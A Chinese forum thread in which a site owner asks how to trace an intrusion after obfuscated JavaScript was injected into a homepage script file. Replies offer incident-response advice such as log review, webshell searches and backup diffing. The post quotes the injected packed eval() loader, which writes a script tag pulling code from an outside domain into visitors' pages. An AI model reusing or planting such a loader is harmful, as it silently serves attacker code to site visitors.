首页包含的js文件中，被人注入下面的js代码的问题，在线等

linux+php+mysql的网站中，首页包含的js文件中，被人注入下面的js代码，

eval(function(p, a, c, k, e, d) {
  e = function(c) {
  return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
  };
  if (!''.replace(/^/, String)) {
  while (c--) {
  d[e(c)] = k[c] || e(c)
  }
  k = [function(e) {
  return d[e]
  }];
  e = function() {
  return '\\w+'
  };
  c = 1
  };
  while (c--) {
  if (k[c]) {
  p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
  }
  }
  return p
} ('G(f(p,a,c,k,e,d){e=f(c){h c.i(H)};m(!\'\'.l(/^/,z)){j(c--){d[c.i(a)]=k[c]||c.i(a)}k=[f(e){h d[e]}];e=f(){h\'\\\\w+\'};c=1};j(c--){m(k[c]){p=p.l(x v(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}h p}(\'4.3(\\\'<2 0="1://5.6.a/9/8.7"></b>\\\');\',n,n,\'F|E|A|B|C|D|y|r|q|o|s|t\'.u(\'|\'),0,{}))', 44, 44, '|||||||||||||||function||return|toString|while||replace|if|12|spcode||cp|js|com|script|split|RegExp||new|googleadsl|String|SCRIPT|write|document|www|http|src|eval|36'.split('|'), 0, {}))

现问：１　如何找入侵的入口
　　　２　还有没有残留的木马文件
thanks

被注入过的，基本都是希望渺茫了。。。
webshell一般都会存在，你一个一个的查，查死你。

最好把备份恢复下

看看是否在上传的漏洞。

与注入的木马文件已查到，并用备份copy了，
现问：１　如何找入侵的入口
　　　２　还有没有残留的木马文件

如何找入侵的入口

这个很难说，一般会利用 sql ，上传等获得权限，然后上传webshell等。

还有没有残留的木马文件

这个搜一下是否存在 eval， iframe 这些关键词。

根据文件修改的时间进行筛选，只能是慢慢的找 比较了.细心。是不是网站有上传权限?留言板之类的有漏洞

现有access_log文件，
再问：１如何找入侵的入口
　　　２注入js时，一般会在log文件中留下怎么个记录？　

入侵入口 可以从服务器的日志进行分析，但是如果对方有足够的权限那么日志也是可以篡改的.所以你的2 也没有啥意义。不过前提先认为对方还没有那个权限，或者没那个能力吧.

查看文件修改时间和 日志里时间范围的访问文件.

找webshell 先找最新更新的文件...

有最近的整站备份文件吗？ 可以用UltraCompare的2进制对比一下 现在的整站目录和备份的整站目录，
哪些文件不一样、哪个字符不一样、 多了哪些文件少了哪些，一下就对比出来了。

UltraCompare 不知道能不能在linux上跑，不行的话楼主把站点打包到本地对比下